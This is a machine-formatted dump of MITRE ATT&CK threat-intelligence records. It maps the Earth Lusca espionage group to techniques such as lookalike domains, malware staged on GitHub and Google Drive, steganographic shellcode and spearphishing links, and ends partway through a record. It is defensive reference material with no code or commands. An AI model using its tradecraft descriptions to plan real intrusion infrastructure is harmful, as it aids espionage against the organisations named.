object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has established GitHub accounts to host their malware.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--0167e4ad-b828-4813-88bf-f5b03b4d3268
revoked : False
technique : Web Services
technique_description : Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1583.006
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Internet Scan: Response Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised Google Drive repositories.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--2dc666e3-b715-425c-b8b4-f3c0f7d6d8e9
revoked : False
technique : Web Services
technique_description : Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1584.006
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Internet Scan: Response Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--0e837480-f359-4bdc-875a-d953027d17b0
revoked : False
technique : Upload Malware
technique_description : Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.

Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)

Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1608.001
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Internet Scan: Response Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.(Citation: TrendMicro EarthLusca 2022) 
relationship_id : relationship--5ce84367-05cc-446e-a744-08a46f103552
revoked : False
technique : Domains
technique_description : Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)

Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1583.001
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Domain Name: Passive DNS', 'Domain Name: Domain Registration', 'Domain Name: Active DNS']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used compromised web servers as part of their operational infrastructure.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--ff6f4b5b-1b5f-4f8f-9307-345a3c278151
revoked : False
technique : Server
technique_description : Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1584.004
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Internet Scan: Response Content', 'Internet Scan: Response Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired multiple servers for some of their operations, using each server for a different role.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--dd033098-eb56-4c17-90d7-c7673f04bcd6
revoked : False
technique : Server
technique_description : Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1583.004
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Internet Scan: Response Metadata', 'Internet Scan: Response Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used steganography to hide shellcode in a BMP image file.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--09f5abff-ad09-4d5b-a6c4-612d4171c089
revoked : False
technique : Steganography
technique_description : Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) 

By the end of 2017, a threat group used <code>Invoke-PSImage</code> to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1027.003
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['File: File Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006)  has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316
revoked : False
technique : Malicious Link
technique_description : An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1204.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['File: File Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

